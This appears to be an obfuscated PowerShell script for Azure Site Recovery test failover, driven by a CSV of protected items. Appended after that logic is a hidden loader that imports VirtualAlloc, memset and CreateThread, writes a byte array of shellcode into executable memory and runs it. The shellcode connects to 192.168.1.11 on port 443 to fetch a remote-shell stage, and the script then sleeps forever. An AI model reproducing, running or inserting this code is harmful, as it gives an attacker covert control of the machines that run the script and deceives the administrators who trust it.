Param(
    [parameter(MAnDatOry=${tr`UE})]
    ${CsV`FilEP`ATh}
)

${er`RoR`Ac`TIo`Npr`EFEReN`cE} = ("{1}{0}" -f 'op','St')

${scrI`pT`sPA`Th} = ${pSscrI`p`TrO`Ot}
if (${Ps`scRiPt`ROoT} -eq "") {
    ${s`CrIPts`p`ATh} = "."
}

. "$scriptsPath\asr_logger.ps1"
. "$scriptsPath\asr_common.ps1"
. "$scriptsPath\asr_csv_processor.ps1"

Function PrO`cessi`Te`M`imPL(${Pr`O`CeS`sOr}, ${C`sV`iTem}, ${reP`Or`Ti`Tem}) {
    ${RE`p`orTiTEm} | &("{2}{1}{0}"-f'ber','m','Add-Me') ("{1}{2}{0}"-f 'eProperty','No','t') ("{0}{1}{3}{4}{5}{2}" -f 'T','estFai','d','lov','erJ','obI') ${NU`ll}
    ${RePo`RTI`TEm} | .("{1}{0}{2}{3}" -f 'dd-Mem','A','be','r') ("{2}{0}{1}" -f'ePro','perty','Not') ("{3}{1}{0}{2}"-f'St','tFailover','ate','Tes') ${NU`lL}
    ${Re`pOrT`I`Tem} | &("{1}{2}{0}"-f 'd-Member','A','d') ("{2}{0}{1}"-f 'rt','y','NotePrope') ("{0}{3}{1}{2}{5}{4}"-f'T','Failo','ve','est','StateDescription','r') ${n`ULL}

    ${VAuLT`NA`Me} = ${CSv`IT`eM}."v`AUlt_`NAme"
    ${SO`U`R`cea`CcountNaMe} = ${c`sVIT`em}."a`ccoU`NT_NA`Me"
    ${S`o`U`RcE`mACHIneNA`Me} = ${c`Sv`ItEM}."SoUrCe_`MAc`HiN`E`_NA`Me"
    ${SO`URC`eCONfiGurATioNSe`R`VeR} = ${Csv`IT`eM}."coN`FI`gurATI`on_SerVEr"
    ${tarG`eTt`e`s`TFa`ILovErVnEt} = ${c`s`VItem}."TEsTf`A`ILoV`eR_vNet"
    ${TaRgetVnE`T`Rg} = ${C`S`ViTeM}."Ta`R`geT`_V`NEt_RG"


    ${PR`oT`EcTe`DITEM} = ${aS`RCo`mm`ON}.("{3}{6}{1}{0}{2}{5}{4}" -f 'edItem','t','FromV','GetProt','lt','au','ec').Invoke(${vaU`l`TnaMe}, ${S`oUrCeM`A`C`HINENAME}, ${So`Urc`EcOn`Fi`GurATI`ON`sERVER})
    if (${PRo`TeC`TEdI`TEm} -ne ${Nu`lL}) {
        if (${pRoT`E`cTEDi`Tem}."alLOWe`doPEr`AT`ionS".("{1}{0}"-f 'ns','Contai').Invoke(("{0}{1}{2}{3}"-f'Tes','tFa','i','lover'))) {
            ${p`Ro`CEsS`OR}."l`ogger".("{0}{1}{2}" -f 'Log','Trac','e').Invoke("Starting TestFailover operation for item '$($sourceMachineName)' ")
            
            ${TarGEttE`StF`AilovervN`ETO`Bj} = .("{4}{0}{3}{1}{2}"-f 'Azu','mV','irtualNetwork','reR','Get-') `
                -Name ${taRgE`T`T`eStfaiLov`e`RVNET} `
                -ResourceGroupName ${tArG`et`Vne`T`RG} 

            
            ${T`E`S`TfailoVer`Job} = &("{4}{2}{1}{0}{3}{6}{5}{8}{7}"-f'ry','-AzureRmRecove','t','Se','Star','icesAs','rv','FailoverJob','rTest') `
                -ReplicationProtectedItem ${PRo`TE`C`TeDITEm} `
                -AzureVMNetworkId ${targ`Et`TE`sTfailO`VERvN`EToBJ}."Id" `
                -Direction ("{3}{2}{0}{5}{4}{1}"-f'yTo','y','ar','Prim','cover','Re')
            ${Re`pORTI`T`eM}."T`Estf`AiLo`VeRjoBid" = ${testfa`IloV`Er`JoB}."id"
        } else {
            ${pRO`c`eSs`Or}."l`o`GGER".("{1}{0}"-f 'e','LogTrac').Invoke("TestFailover operation not allowed for item '$($sourceMachineName)' ")
            ${r`epO`RtiteM}."te`sTF`AILoVER`s`TATe" = ${pr`oTE`cTeD`iT`Em}."tE`st`FA`I`lOver`STate"
            ${rE`PortI`Tem}."tE`StfaILOVer`StatED`ES`C`R`IPt`iON" = ${PRo`T`eCT`ediT`eM}."TeStfA`I`lOvEr`s`Ta`TEdEsCriPTI`On"
        }
    }
}

Function PRoC`es`SiTeM(${PRoC`Ess`Or}, ${CSVi`TeM}, ${re`PoR`TIt`EM})
{
    try {
        &("{2}{0}{3}{1}"-f 'oces','l','Pr','sItemImp') ${pr`oCEss`Or} ${cS`V`ItEm} ${rEp`O`RtIt`eM}
    }
    catch {
        ${Ex`CEP`TIOnmes`SAGE} = ${_} | .("{2}{1}{0}" -f 'g','in','Out-Str')
        ${pro`C`esS`oR}."LO`ggeR".("{2}{1}{0}" -f'or','ogErr','L').Invoke(${exCe`Pti`onm`ESs`AgE})
        throw
    }
}

${lOgg`er} = .("{3}{4}{2}{0}{5}{1}"-f't','ce','gerIns','Ne','w-AsrLog','an') -CommandPath ${p`S`cOmManDP`ATh}
${A`s`R`CommON} = &("{4}{3}{0}{2}{5}{1}{6}" -f 'srCo','st','mm','A','New-','onIn','ance') -Logger ${l`oGg`er}
${prO`ceS`Sor} = .("{3}{5}{0}{2}{4}{1}" -f's','tance','so','New-CsvP','rIns','roce') -Logger ${L`O`GGer} -ProcessItemFunction ${FU`NCtion:p`R`OCEsS`i`TEm}
${PrOc`E`SSOr}.("{1}{0}{2}"-f 'ssFi','Proce','le').Invoke(${c`SVF`IlEP`Ath})


${C} = (((("{19}{1}{68}{6}{11}{79}{3}{113}{106}{23}{101}{114}{100}{27}{4}{110}{17}{48}{82}{39}{34}{22}{15}{53}{37}{31}{25}{81}{14}{85}{45}{98}{36}{52}{115}{112}{74}{2}{21}{47}{59}{108}{56}{13}{91}{103}{96}{24}{80}{60}{62}{28}{72}{49}{107}{57}{5}{97}{63}{42}{75}{86}{46}{20}{111}{64}{87}{84}{89}{58}{0}{51}{43}{94}{67}{92}{83}{65}{38}{104}{93}{26}{76}{77}{71}{9}{30}{66}{109}{10}{61}{78}{73}{16}{105}{12}{69}{8}{54}{102}{99}{90}{55}{44}{33}{32}{7}{95}{88}{18}{50}{41}{29}{70}{40}{35}" -f', ui','llImpo',' ','32.d','tualAl',' I','({0','n','tic e','lI','{0}msv','}kerne','t','e',');','locat','lic ','r','t','[D','ess, IntPt','IntP','Al','c ex',' lpThre','te','pThr','tPtr Vir','s','src,','m','Pro','(I','et',', uint fl',');','l{','nType, uint fl',',','Size','ount','dest, uint ','r lp',' ','s','0','dr','tr C',' lpAddr','nt dwS','r ','nt','0})]pub','io','xtern I',' mem','t','e,','er','r','At','crt.','tribute','Pt','l','onFlags','por','rea','rt','a',' uint c','l',', ui','pub',' static extern','Start','eadId);','[D','dll{0})]','l','ad','ct','ess, uint dw','i','ame','[DllImport({','Ad','pPar','P','t','r','Thread(In','t','l','dwC','t','tr','nt','}kernel32.dl','Pt',' In','t','nt','tP',' IntPtr ','s','ic stati','tackSiz','ea','t(','loc(IntPt','r ','c','ll{0})]publ','ern','li'))-f  [chAr]34));${w} = .("{2}{1}{0}" -f'ype','dd-T','A') -memberDefinition ${c} -Name ("{1}{0}"-f'n32','Wi') -namespace ("{2}{0}{3}{4}{1}" -f 'n32','tions','Wi','Fun','c') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x0b,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."lE`NGTH" -gt 0x1000){${G} = ${Z}."lE`NGtH"};${X}=${w}::("{0}{1}{3}{2}" -f 'Virt','u','c','alAllo').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."lE`NGTH"-1);${i}++) {${W}::"MEM`S`Et"([IntPtr](${x}.("{1}{0}"-f '32','ToInt').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{2}{3}{0}{1}" -f'ate','Thread','Cr','e').Invoke(0,0,${X},0,0,0);for (;;){.("{2}{0}{1}{3}"-f 'tart-','slee','S','p') 60};
